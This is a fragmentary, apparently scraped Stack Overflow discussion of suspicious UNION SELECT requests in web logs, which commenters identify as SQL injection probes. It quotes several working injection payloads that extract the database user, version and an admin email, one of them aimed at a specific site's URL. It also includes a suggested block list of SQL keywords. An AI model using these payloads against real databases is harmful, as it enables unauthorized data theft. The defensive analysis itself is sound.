sql - Union to handle NULL values - Stack Overflow ... count(*),concat((select ( select concat(0x7e,0x27,Hex(cast(user() as char)),0x27
...999999.9'+union+all+select+null,null,null,null,null,null,null,null,null,null+and+'0'='0...
http://www.itamed.com/mcms/itamedt/content.cfm?pulldata=scmsmembers.cfm&function=members&perform=memberappita&entity_id=11+limit+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version
999999.9+union+all+select+%27R3DM0V3_hvj_injection',null
So, as it's being used a lot, I would submit my answer. In my opinion, the aim of these requests is to check the presence or absence of a sql injection. This is the part of the query that is trying to inject: 999999.9 UNION ALL SELECT "91351456272.9","91351456272.9"...
The used SELECT statement, referer: http://site.com/index.php?page=shop.browse&category_id=25&option...
Your thoughts about changing the nature of your business are helpful. On my site, for instance, it's entirely safe to fail any request with the string 'concat' or %20union' or 'information_schema'.
...t=999999.9'+union+all+select+0x31303235343830303536,(select+concat(0x7e,0x27,unhex(Hex(cast(a_admin.email+as+char))),0x5e
union all select id =null union all select id =1 +and+ false + union +all +select id = 9999 union all select +union+distinct+select+